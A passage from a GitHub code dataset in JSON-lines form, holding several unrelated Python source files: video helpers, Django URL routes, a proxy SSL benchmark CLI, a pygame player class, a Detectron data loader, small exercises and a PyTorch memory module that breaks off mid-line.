return v\n\n\ndef str_to_date(date: str) -> datetime:\n if 'T' in date:\n date = date[:date.find('T')]\n date = date.split(\"-\")\n if len(date) != 3:\n logging.warning(_(\"invalid_date\"))\n return datetime.fromtimestamp(0)\n year = int(date[0])\n month = int(date[1])\n day = int(date[2])\n return datetime(year=year, month=month, day=day)\n\n\ndef get_video_bilibili() -> Union[Video, None]:\n bv = prompt_response(_(\"bilibili_link\"))\n if bv.isspace() or len(bv) == 0:\n return None\n if bv:\n bv_canonical = prompt_choices(_(\"bv_canonical\"), [\"Yes\", \"No\"])\n bv_canonical = bv_canonical == 1\n return video_from_site(VideoSite.BILIBILI, bv, bv_canonical)\n\n\ndef get_video(videos: List[Video], site: VideoSite):\n for v in videos:\n if v.site == site:\n return v\n return None\n\n\ndef only_canonical_videos(videos: List[Video]) -> List[Video]:\n return [v for v in videos if v.canonical]\n","repo_name":"lihaohong6/MGP-VJ-tool","sub_path":"models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"13723893930","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('hotels/', views.HotelList.as_view(), name='hotel-list'),\n path('hotels//', views.HotelDetail.as_view(), name='hotel-detail'),\n path('roomtypes/', views.RoomTypeList.as_view(), name='roomtype-list'),\n path('roomtypes//', views.RoomTypeDetail.as_view(), name='roomtype-detail'),\n path('bookings/', views.BookingList.as_view(), name='booking-list'),\n path('bookings//', views.BookingDetail.as_view(), name='booking-detail'),\n]\n","repo_name":"DrSleep16/hotel_booking","sub_path":"hotel_booking/hotel_reservation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6278003523","text":"from click import command, option, pass_obj\n\nfrom proxy_benchmarks.enums import MimicTypeEnum\nfrom proxy_benchmarks.load_test import run_load_server\nfrom proxy_benchmarks.networking import SyntheticHostDefinition, SyntheticHosts\nfrom proxy_benchmarks.proxies.base import ProxyBase\nfrom proxy_benchmarks.proxies.gomitmproxy import GoMitmProxy\nfrom proxy_benchmarks.proxies.goproxy import GoProxy\nfrom proxy_benchmarks.proxies.martian import MartianProxy\nfrom proxy_benchmarks.proxies.mitmproxy import MitmProxy\nfrom proxy_benchmarks.proxies.node_http_proxy import NodeHttpProxy\nfrom proxy_benchmarks.requests import ChromeRequest, RequestBase\n\n\n@command()\n@option(\"--inspect-browser\", is_flag=True, default=True)\n@pass_obj\ndef basic_ssl_test(obj, inspect_browser: bool):\n \"\"\"\n Walk through the different proxy servers and test their SSL validity separately.\n \n :param inspect-browser: If true, upon issuing each command will wait for the user to press\n enter to continue. This allows you to fully inspect to certificate in the Chrome inspector\n and debugging console.\n\n \"\"\"\n proxies: list[ProxyBase] = [\n GoProxy(MimicTypeEnum.STANDARD),\n GoProxy(MimicTypeEnum.MIMIC),\n MitmProxy(),\n NodeHttpProxy(),\n GoMitmProxy(MimicTypeEnum.STANDARD),\n GoMitmProxy(MimicTypeEnum.MIMIC),\n MartianProxy(),\n ]\n\n request = ChromeRequest(headless=False, keep_open=inspect_browser)\n execute_raw(obj, inspect_browser, request, proxies)\n\n\ndef execute_raw(obj, inspect_browser: bool, request: RequestBase, proxies: list[ProxyBase]):\n console = obj[\"console\"]\n divider = obj[\"divider\"]\n\n with run_load_server() as load_server_definition:\n synthetic_ip_addresses = SyntheticHosts(\n [\n SyntheticHostDefinition(\n name=\"load-server\",\n http_port=load_server_definition[\"http\"],\n https_port=load_server_definition[\"https\"],\n )\n ]\n ).configure()\n synthetic_ip_address = next(iter(synthetic_ip_addresses.values()))\n print(\"\\nSynthetic IP\", synthetic_ip_address)\n\n if inspect_browser:\n print(\"Waiting for manual client access...\")\n if input(\" > Press enter when ready...\") != \"\":\n return\n\n for proxy in proxies:\n with proxy.launch():\n console.print(f\"{divider}\\nTesting {request} with proxy {proxy})\\n{divider}\", style=\"bold blue\")\n request.handle_request(\n f\"https://{synthetic_ip_address}/handle\",\n proxy=f\"http://localhost:{proxy.port}\",\n )\n","repo_name":"piercefreeman/grooveproxy","sub_path":"proxy-benchmarks/proxy_benchmarks/cli/ssl_validity.py","file_name":"ssl_validity.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"35297882298","text":"import pygame\n\nfrom entity import Entity\n\nANIMATION_TYPES = [\"run\", \"idle\", \"jump\"]\n\n\nclass Player(Entity):\n def __init__(self, data):\n super().__init__(data)\n\n self.state = \"idle\"\n self.face_direction = \"right\"\n self.x = self.tiles[0][\"position\"][0][0] # todo: consertar isso daqui\n self.y = self.tiles[0][\"position\"][0][1]\n\n self.width = self.tiles[0][\"width\"]\n self.height = self.tiles[0][\"height\"]\n\n self.velocity = 0.0\n self.max_velocity = 10.0\n self.acceleration = 0.4\n self.deceleration = 0.4\n\n self.vertical_velocity = 0.0\n self.jump_acceleration = -11.0\n self.gravity = 12.8\n self.on_ground = True\n\n def parse(self, tile_data):\n for _t in tile_data:\n animation_name = _t[\"type\"].split(\"_\")[1].lower()\n tile = {\n \"animation_name\": animation_name,\n \"current_frame\": 0,\n \"timer_next_frame\": 0.0,\n \"id\": _t.get(\"id\"),\n \"width\": _t.get(\"width\"),\n \"height\": _t.get(\"height\"),\n \"position\": _t.get(\"position\", []).copy(),\n \"sprites\": _t.get(\"sprites\"),\n }\n\n self.tiles.append(tile)\n\n def render(self, screen, block_size):\n for tile in self.tiles:\n if self.state == tile[\"animation_name\"]:\n sprite_to_draw = tile[\"sprites\"][tile[\"current_frame\"]]\n\n if self.face_direction == \"left\":\n sprite_to_draw = pygame.transform.flip(sprite_to_draw, True, False)\n\n screen.blit(\n sprite_to_draw,\n (self.x * block_size[0], self.y * block_size[1]),\n )\n\n def update(self, delta_time, input_handler, tiles):\n self.update_state_and_velocity(input_handler)\n self.update_position(delta_time, tiles)\n self.update_animation_frames(delta_time)\n\n def update_state_and_velocity(self, input_handler):\n if input_handler.is_pressed(\"up\") and self.on_ground:\n self.vertical_velocity = self.jump_acceleration\n self.state = \"jump\"\n self.on_ground = False\n\n if input_handler.is_pressed(\"left\"):\n self.face_direction = \"left\"\n self.state = \"run\"\n self.velocity = max(-self.max_velocity, self.velocity - self.acceleration)\n elif input_handler.is_pressed(\"right\"):\n self.face_direction = \"right\"\n self.state = \"run\"\n self.velocity = min(self.max_velocity, self.velocity + self.acceleration)\n else:\n self.state = \"idle\"\n self.apply_deceleration()\n\n def apply_deceleration(self):\n if self.velocity > 0:\n self.velocity = max(0, self.velocity - self.deceleration)\n elif self.velocity < 0:\n self.velocity = min(0, self.velocity + self.deceleration)\n\n def update_position(self, delta_time, tiles):\n new_x, new_y = self.calculate_new_positions(delta_time)\n new_x = self.handle_horizontal_collision(new_x, new_y, tiles)\n new_y = self.handle_vertical_collision(new_x, new_y, tiles, delta_time)\n\n self.x = new_x\n self.y = new_y\n\n def calculate_new_positions(self, delta_time):\n new_x = self.x + self.velocity * delta_time\n new_y = self.y + self.vertical_velocity * delta_time\n return new_x, new_y\n\n def handle_horizontal_collision(self, new_x, current_y, tiles):\n player_rect = (new_x * 16, current_y * 16, self.width, self.height)\n for tile in tiles:\n if \"collidable\" in tile and tile[\"collidable\"]:\n for position in tile[\"position\"]:\n tile_rect = (\n position[0] * 16,\n position[1] * 16,\n tile[\"width\"],\n tile[\"height\"],\n )\n if self.check_collision(player_rect, tile_rect):\n return self.x # Reset x position if collision detected\n return new_x # Otherwise, return new x position\n\n def handle_vertical_collision(self, current_x, new_y, tiles, delta_time):\n self.on_ground = False\n player_rect = (current_x * 16, new_y * 16, self.width, self.height)\n for tile in tiles:\n if \"collidable\" in tile and tile[\"collidable\"]:\n for position in tile[\"position\"]:\n tile_rect = (\n position[0] * 16,\n position[1] * 16,\n tile[\"width\"],\n tile[\"height\"],\n )\n if self.check_collision(player_rect, tile_rect):\n self.on_ground = True\n self.vertical_velocity = 0\n return self.y # Reset y position if collision detected\n\n if not self.on_ground:\n self.vertical_velocity += self.gravity * delta_time\n\n return new_y # Otherwise, return new y position\n\n def update_animation_frames(self, delta_time):\n for tile in self.tiles:\n if tile[\"timer_next_frame\"] > delta_time:\n tile[\"current_frame\"] = (tile[\"current_frame\"] + 1) % len(\n tile[\"sprites\"]\n )\n tile[\"timer_next_frame\"] -= delta_time\n else:\n tile[\"timer_next_frame\"] += delta_time\n","repo_name":"lucaslattari/2Do_game_engine","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14645756994","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport random\nimport json\n\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n for line in f:\n yield json.loads(line.strip())\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Split data into train, dev, and test')\n parser.add_argument('json', help='Input data file')\n parser.add_argument('target', help='Who should we consider as positive',\n choices=('Jason', 'Terry', 'Both'))\n parser.add_argument('output_dir')\n parser.add_argument('--seed', type=int, default=0)\n args = parser.parse_args()\n\n random.seed(args.seed)\n\n data = list(load_data(args.json))\n\n if args.target == 'Jason' or args.target == 'Terry':\n pos_data = filter(lambda d: d['author'] == args.target, data)\n elif args.target == 'Both':\n pos_data = filter(lambda d: d['author'] == 'Jason' or\n d['author'] == 'Terry', data)\n neg_data = filter(lambda d: d['author'] != 'Jason' and\n d['author'] != 'Terry', data)\n\n for d in pos_data:\n d['label'] = 1\n for d in neg_data:\n d['label'] = 0\n\n random.shuffle(pos_data)\n random.shuffle(neg_data)\n\n train_ratio = 0.7\n dev_ratio = 0.2\n assert(train_ratio + dev_ratio < 1)\n\n pos_num_data = len(pos_data)\n neg_num_data = len(neg_data)\n\n pos_split1 = int(pos_num_data * train_ratio)\n pos_split2 = int(pos_num_data * (train_ratio + dev_ratio))\n neg_split1 = int(neg_num_data * train_ratio)\n neg_split2 = int(neg_num_data * (train_ratio + dev_ratio))\n\n train_data = pos_data[:pos_split1] + neg_data[:neg_split1]\n dev_data = pos_data[pos_split1:pos_split2] + neg_data[neg_split1:neg_split2]\n test_data = pos_data[pos_split2:] + neg_data[neg_split2:]\n\n def write_file(filename, data):\n with open(filename, 'w') as f:\n for d in data:\n f.write('{}\\n'.format(json.dumps(d)))\n\n write_file(os.path.join(args.output_dir, 'train.json'), train_data)\n write_file(os.path.join(args.output_dir, 'dev.json'), dev_data)\n write_file(os.path.join(args.output_dir, 'test.json'), test_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mrorii/findjatbar","sub_path":"findjatbar/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"19217132232","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport logging\nimport numpy as np\nimport os\nimport copy\n\nfrom detectron.core.config import cfg\nimport detectron.roi_data.fast_rcnn as fast_rcnn_roi_data\nimport detectron.roi_data.retinanet as retinanet_roi_data\nimport detectron.roi_data.rpn as rpn_roi_data\nimport detectron.utils.blob as blob_utils\n\nlogger = logging.getLogger(__name__)\n\n#import sys\n#sys.path.append('/home/gaomingda/softer_nms_LIP_JPPNet/detectron/LIP_JPPNet')\n#from evaluate_pose_JPPNet import draw_resized_pose\n\ndef get_minibatch_blob_names(is_training=True):\n \"\"\"Return blob names in the order in which they are read by the data loader.\n \"\"\"\n # data blob: holds a batch of N images, each with 3 channels\n blob_names = ['data']\n blob_names += ['normalizer'] # focal loss at fast_rcnn_heads\n# blob_names += ['normalizer_fcn'] # focal loss at mask_res_top\n# blob_names += ['pose_pred']\n blob_names += ['pose_pred_4']\n blob_names += ['pose_pred_8']\n blob_names += ['pose_pred_16']\n blob_names += ['pose_pred_32']\n \n blob_names += ['pose_line_8']\n blob_names += ['pose_line_16']\n \n # seg_gt_label, add segementation on top of fpn2-5\n blob_names += ['seg_gt_label']\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster R-CNN\n blob_names += rpn_roi_data.get_rpn_blob_names(is_training=is_training)\n elif cfg.RETINANET.RETINANET_ON:\n blob_names += retinanet_roi_data.get_retinanet_blob_names(\n is_training=is_training\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n blob_names += fast_rcnn_roi_data.get_fast_rcnn_blob_names(\n is_training=is_training\n )\n return blob_names\n\n\n#def get_minibatch(roidb, pose_pred_model):\ndef get_minibatch(roidb):\n \"\"\"Given a roidb, construct a minibatch sampled from it.\"\"\"\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n # Get the input image blob, formatted for caffe2\n# im_blob, im_scales = _get_image_blob(roidb)\n im_blob, im_scales, pose_pred, pose_line, blobs['seg_gt_label'] = _get_image_pose_blob(roidb) # pose_pred the same shape with im_blob\n blobs['data'] = im_blob\n blobs['normalizer'] = np.array([100], dtype=np.float32)\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n blobs['pose_pred_4'], blobs['pose_pred_8'], blobs['pose_pred_16'], blobs['pose_pred_32'] = _resize_pose_blob(pose_pred, channel=26)\n else:\n blobs['pose_pred_4'], blobs['pose_pred_8'], blobs['pose_pred_16'], blobs['pose_pred_32'] = _resize_pose_blob(pose_pred, channel=26)\n# blobs['pose_pred_8'], blobs['pose_pred_16'] = _resize_pose_blob_to13(pose_pred) # pose 16 to 13 channel\n# blobs['pose_sum_8'], blobs['pose_sum_16'] = pose_sum_to_onehotmap(blobs['pose_pred_8'], blobs['pose_pred_16'])\n blobs['pose_line_8'], blobs['pose_line_16'] = _resize_poseline_blob(pose_line)\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = rpn_roi_data.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n im_width, im_height = im_blob.shape[3], im_blob.shape[2]\n # im_width, im_height corresponds to the network input: padded image\n # (if needed) width and height. We pass it as input and slice the data\n # accordingly so that we don't need to use SampleAsOp\n valid = retinanet_roi_data.add_retinanet_blobs(\n blobs, im_scales, roidb, im_width, im_height\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = fast_rcnn_roi_data.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n# blobs['pose_pred'] = pose_pred_model.pred_pose_batch(roidb)\n# pose_pred_model.draw_batch(blobs['pose_pred'], roidb)\n# blobs['pose_pred'] = _get_pose_pred(roidb)\n \n# logger.info(blobs['pose_pred'].shape)\n return blobs, valid\n\n\ndef _get_image_blob(roidb):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS, target_size, cfg.TRAIN.MAX_SIZE\n )\n im_scales.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n blob = blob_utils.im_list_to_blob(processed_ims)\n\n return blob, im_scales\n\ndef _get_pose_pred(roidb, channel=16):\n \"\"\"get LIP_JPP pose prediction from .bin file\n \"\"\"\n num_images = len(roidb)\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/LIP_JPP_pred_pose/train'\n pred_pose_data = '/home/gaomingda/datasets/lip_body25/train_images'\n pose_line_data = '/home/gaomingda/Downloads/gaomingda/dataset/LIP_JPP_pose_edge/train'\n if 'ATR' in cfg.TRAIN.DATASETS[0]:\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/ATR_JPP_pred_pose'\n# pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/ATR_JPP_crop_pred_pose'\n pred_pose_data = '/home/gaomingda/Downloads/gaomingda/dataset/ATR_openpose'\n if 'LIP' in cfg.TRAIN.DATASETS[0]:\n pose_blob = np.zeros((num_images, 48, 48, channel), dtype=np.float32)\n else: # ATR\n pose_blob = np.zeros((num_images, 48, 48, 26), dtype=np.float32)\n pose_line_blob = np.zeros((num_images, 48, 48), dtype=np.float32)\n for i in range(num_images):\n entry = roidb[i]\n if 'ATR' in cfg.TRAIN.DATASETS[0]:\n if entry['flipped']:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap_flip', entry['id']+'.bin')\n else:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap', entry['id']+'.bin')\n pred_ = np.fromfile(pred_pose_path, dtype=np.float32)\n pred_ = pred_.reshape(48, 48, 26)\n pose_blob[i] = pred_\n else: # LIP\n if entry['flipped']:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap_flip', entry['id']+'.bin')\n else:\n pred_pose_path = os.path.join(pred_pose_data, 'heatmap', entry['id']+'.bin')\n pred_ = np.fromfile(pred_pose_path, dtype=np.float32)\n pred_ = pred_.reshape(48, 48, channel)\n # pose line\n #pose_line = np.fromfile(os.path.join(pose_line_data, entry['id']+'.bin'), dtype=np.float32)\n #pose_line = pose_line.reshape(48, 48)\n pose_line = np.zeros((48, 48), dtype=np.float32)\n# if entry['flipped']:\n# pred_ = flip_pose(pred_)\n# # pose line\n# pose_line = pose_line[:, ::-1]\n pose_blob[i] = pred_\n # pose line \n pose_line_blob[i] = pose_line\n # select 0-15 channel\n #print(\"train body25, select poses 0-16 channel\")\n pose_blob = pose_blob[:, :, :, 0:16]\n return pose_blob , pose_line_blob\n\ndef flip_pose(pose):\n \"\"\"input: pose, is array of size(none, none, 16)\n \"\"\"\n flip_pose = np.zeros(pose.shape, dtype=np.float32)\n flip_pose[:, :, 0] = pose[:, :, 5]\n flip_pose[:, :, 1] = pose[:, :, 4]\n flip_pose[:, :, 2] = pose[:, :, 3]\n flip_pose[:, :, 3] = pose[:, :, 2]\n flip_pose[:, :, 4] = pose[:, :, 1]\n flip_pose[:, :, 5] = pose[:, :, 0]\n flip_pose[:, :, 10] = pose[:, :, 15]\n flip_pose[:, :, 11] = pose[:, :, 14]\n flip_pose[:, :, 12] = pose[:, :, 13]\n flip_pose[:, :, 13] = pose[:, :, 12]\n flip_pose[:, :, 14] = pose[:, :, 11]\n flip_pose[:, :, 15] = pose[:, :, 10]\n flip_pose[:, :, 6] = pose[:, :, 6]\n flip_pose[:, :, 7] = pose[:, :, 7]\n flip_pose[:, :, 8] = pose[:, :, 8]\n flip_pose[:, :, 9] = pose[:, :, 9]\n return flip_pose[:, ::-1, :]\n\n\ndef _get_image_pose_blob(roidb):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS, target_size, cfg.TRAIN.MAX_SIZE\n )\n im_scales.append(im_scale)\n processed_ims.append(im)\n\n # Create a blob to hold the input images\n # pose_line: (num_images, 48, 48)\n poses, pose_line = _get_pose_pred(roidb, channel=26)\n# show_pose(roidb, poses, im_scales)\n # seg_gt label\n seg_gt_list = _prep_seg_gt_for_blob(roidb)\n\n im_blob, pose_blob, pose_line_blob, seg_gt_blob = blob_utils.im_list_to_blob_andPose(processed_ims, poses, pose_line, seg_gt_list)\n# show_pose(roidb, pose_blob, im_scales)\n# blob = blob_utils.im_list_to_blob(processed_ims)\n\n return im_blob, im_scales, pose_blob, pose_line_blob, seg_gt_blob\n\ndef show_pose(roidb, pose_blob, im_scales):\n num_images = len(roidb)\n for i in range(num_images):\n pose_blob_i = pose_blob[i]\n pred_poses = []\n for j in range(16):\n channel_ = pose_blob_i[:, :, j]\n r_, c_ = np.unravel_index(channel_.argmax(), channel_.shape)\n# if channel_[r_, c_]>0.3:\n# pred_poses.append([r_, c_])\n# else:\n# pred_poses.append([-1, -1])\n pred_poses.append([r_, c_])\n draw_resized_pose(roidb[i]['image'], pred_poses, im_scales[i], roidb[i]['flipped'])\n\ndef _resize_pose_blob(pose_pred, channel=16):\n n, h, w, channel = pose_pred.shape\n pose_shrink4 = np.zeros((n, int(h/4.), int(w/4.), channel), dtype=np.float32)\n pose_shrink8 = np.zeros((n, int(h/8.), int(w/8.), channel), dtype=np.float32)\n pose_shrink16 = np.zeros((n, int(h/16.), int(w/16.), channel), dtype=np.float32)\n pose_shrink32 = np.zeros((n, int(h/32.), int(w/32.), channel), dtype=np.float32)\n for i in range(n):\n pose_shrink4[i] = cv2.resize(pose_pred[i, :, :, :], None, None, 1./4., 1./4.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink8[i] = cv2.resize(pose_pred[i, :, :, :], None, None, 1./8., 1./8.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink16[i] = cv2.resize(pose_pred[i], None, None, 1./16., 1./16.,\n interpolation=cv2.INTER_LINEAR)\n pose_shrink32[i] = cv2.resize(pose_pred[i], None, None, 1./32., 1./32.,\n interpolation=cv2.INTER_LINEAR)\n return pose_shrink4, pose_shrink8, pose_shrink16, pose_shrink32\n\ndef _resize_poseline_blob(pose_pred):\n n, h, w = pose_pred.shape\n# pose_shrink4 = np.zeros((n, int(h/4.), int(w/4.)), dtype=np.float32)\n pose_shrink8 = np.zeros((n, int(h/8.), int(w/8.)), dtype=np.float32)\n pose_shrink16 = np.zeros((n, int(h/16.), int(w/16.)), dtype=np.float32)\n for i in range(n):\n# pose_shrink4[i] = cv2.resize(pose_pred[i, :, :], None, None, 1./4., 1./4.,\n# interpolation=cv2.INTER_NEAREST)\n pose_shrink8[i] = cv2.resize(pose_pred[i, :, :], None, None, 1./8., 1./8.,\n interpolation=cv2.INTER_NEAREST)\n pose_shrink16[i] = cv2.resize(pose_pred[i], None, None, 1./16., 1./16.,\n interpolation=cv2.INTER_NEAREST)\n return pose_shrink8, pose_shrink16\n\ndef _resize_pose_blob_to13(pose_pred):\n \"\"\"first combine 16 channel pose pred to 13 channel(6,B_Pelvis ,B_Spine ,B_Neck ,B_Head)\n then shrink 1./8, 1.16 the 13 channel pose blob \n \"\"\"\n n, h, w, _ = pose_pred.shape\n pose_13 = np.zeros((n, h, w, 13), dtype=np.float32)\n pose_13[:, :, :, 0:6] = pose_pred[:, :, :, 0:6]\n pose_13[:, :, :, 7] = pose_pred[:, :, :, 10]\n pose_13[:, :, :, 6] = pose_pred[:, :, :, 6]+pose_pred[:, :, :, 7]+pose_pred[:, :, :, 8]+pose_pred[:, :, :, 9]\n return _resize_pose_blob(pose_13, channel=13)\n\ndef pose_sum_to_onehotmap(pose_blob_8, pose_blob_16):\n \"\"\"pose_blob: shape (num_imgs, h, w, 16)\n pose_blob_8: same shape with res3\n pose_blob_16: same shape with res4\n \"\"\"\n n, h, w, c = pose_blob_8.shape\n _, h_16, w_16, _ = pose_blob_16.shape\n \n pose_sum_8 = np.sum(pose_blob_8, axis=3)\n pose_sum_16 = np.sum(pose_blob_16, axis=3)\n \n one_hot_blob_res3 = np.zeros((n, 512, h, w), dtype=np.float32)\n one_hot_blob_res4 = np.zeros((n, 1024, h_16, w_16), dtype=np.float32)\n for i in range(n):\n one_hot_blob_res3[i, :, :, :] = pose_sum_8[i]\n one_hot_blob_res4[i, :, :, :] = pose_sum_16[i]\n return one_hot_blob_res3, one_hot_blob_res4\n\ndef _prep_seg_gt_for_blob(roidb):\n \"\"\"load seg gt label\n return: 2D array\n return: a list of seg_gt array(H, W)\n \"\"\"\n seg_gt_list = []\n for entry in roidb:\n seg_gt = cv2.imread(entry['ins_seg'], 0)\n if entry['flipped']:\n seg_gt = seg_gt[:, ::-1]\n label_ = copy.deepcopy(seg_gt)\n dataset_name = cfg.TRAIN.DATASETS[0]\n if 'LIP' in dataset_name:\n orig2flipped = {14:15, 15:14, 16:17, 17:16, 18:19, 19:18}\n if 'ATR' in dataset_name:\n orig2flipped = {\n 9: 10, 10: 9, 12: 13, 13: 12, 14: 15, 15: 14}\n \n for i in orig2flipped.keys():\n ind_i = np.where(label_==i)\n if len(ind_i[0])==0:\n continue\n seg_gt[ind_i] = int(orig2flipped[i])\n \n # seg_gt = cv2.resize(seg_gt, None, None, fx=im_scale, fy=im_scale,\n # interpolation=cv2.INTER_NEAREST)\n seg_gt = np.array(seg_gt, dtype=np.int32)\n seg_gt_list.append(seg_gt)\n\n return seg_gt_list ","repo_name":"994374821/maskrcnn_body25","sub_path":"detectron/roi_data/minibatch.py","file_name":"minibatch.py","file_ext":"py","file_size_in_byte":14618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22886472465","text":"class Solution:\n def letterCombinations(self, digits):\n ans = []\n phoneDict = {\n \"2\" : [\"a\", \"b\", \"c\"],\n \"3\" : [\"d\", \"e\", \"f\"],\n \"4\" : [\"g\", \"h\", \"i\"],\n \"5\" : [\"j\", \"k\", \"l\"],\n \"6\" : [\"m\", \"n\", \"o\"],\n \"7\" : [\"p\", \"q\", \"r\", \"s\"],\n \"8\" : [\"t\", \"u\", \"v\"],\n \"9\" : [\"w\", \"x\", \"y\", \"z\"]\n }\n letters = []\n for digit in digits:\n letters.append(phoneDict[digit])\n\n self.combine_letters(letters, 0, \"\", ans)\n\n return ans\n\n def combine_letters(self, letters, index, curr_comb, ans):\n if index < len(letters):\n for letter in letters[index]:\n self.combine_letters(letters, index + 1, curr_comb + letter, ans)\n \n if len(curr_comb) == len(letters):\n ans.append(curr_comb)\n\nsolution = Solution()\nprint(solution.letterCombinations(\"23\"))","repo_name":"henriqueconte/Challenges","sub_path":"LeetCode/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44284475521","text":"month = int(input(\"Enter the current month (1 to 12): \"))\n\nspring_months = [3, 4, 5]\nsummer_months = [6, 7, 8]\nautumn_months = [9, 10, 11]\nwinter_months = [12, 1, 2]\n\nif month in spring_months:\n season = \"Spring\"\nelif month in summer_months:\n season = \"Summer\"\nelif month in autumn_months:\n season = \"Autumn\"\nelse:\n season = \"Winter\"\n\nprint(f\"The season for month {month} is {season}.\")\n","repo_name":"liorbn03/myrepository","sub_path":"Week 7/Day 2/XP Gold/EXE02.py","file_name":"EXE02.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2782431975","text":"import torch\nfrom torch import nn\nimport math\nfrom math import sqrt, pi\nfrom torch.nn import functional as F\n\n\nclass MemoryBlock(nn.Module):\n def __init__(self, mem_dim, z_dim, shrink_thres=0.005, tem=0.5):\n super().__init__()\n self.mem_dim = mem_dim\n self.z_dim = z_dim\n self.shrink_thres = shrink_thres\n self.tem = tem\n self.register_buffer(\"mem\", torch.randn(self.mem_dim, self.z_dim))\n self.register_buffer(\"mem_ptr\", torch.zeros(1, dtype=torch.long))\n\n self.reset_parameters()\n\n def reset_parameters(self):\n stdv = 1. / math.sqrt(self.mem.size(1))\n self.mem.data.uniform_(-stdv, stdv)\n\n @torch.no_grad()\n def update_mem(self, z):\n batch_size = z.shape[0] # z, B x C\n ptr = int(self.mem_ptr)\n assert self.mem_dim % batch_size == 0\n\n # replace the keys at ptr (dequeue and enqueue)\n self.mem[ptr:ptr + batch_size, :] = z # mem, M x C\n ptr = (ptr + batch_size) % self.mem_dim # move pointer\n\n self.mem_ptr[0] = ptr\n\n def hard_shrink_relu(self, x, lambd=0, epsilon=1e-12):\n x = (F.relu(x-lambd) * x) / (torch.abs(x - lambd) + epsilon)\n return x\n\n def forward(self, x):\n att_weight = torch.mm(x, self.mem.T)\n # filter_value = -float('Inf')\n # indices_to_remove = att_weight < torch.topk(att_weight, k=20, dim=-1)[0][..., -1, None]\n # att_weight[indices_to_remove] = filter_value\n att_weight = F.softmax(att_weight/self.tem, dim=1)\n\n # ReLU based shrinkage, hard shrinkage for positive value\n if (self.shrink_thres > 0):\n att_weight = self.hard_shrink_relu(att_weight, lambd=self.shrink_thres)\n att_weight = F.normalize(att_weight, p=1, dim=1)\n\n output = torch.mm(att_weight, self.mem)\n return output\n\n\nclass Attention(nn.Module):\n def __init__(self, d_model, attention_dropout=0.1):\n super().__init__()\n self.dropout = nn.Dropout(attention_dropout)\n self.norm = nn.LayerNorm(d_model)\n\n self.query_projection = nn.Linear(d_model, d_model)\n self.key_projection = nn.Linear(d_model, d_model)\n self.value_projection = nn.Linear(d_model, d_model)\n\n self.out_projection = nn.Linear(d_model, d_model)\n \n def cos_score(self, q, k):\n norm_q = torch.norm(q, dim=1).unsqueeze(-1)\n norm_k = torch.norm(k, dim=1).unsqueeze(-1)\n return torch.matmul(q, k.transpose(-1,1)) / (norm_q * 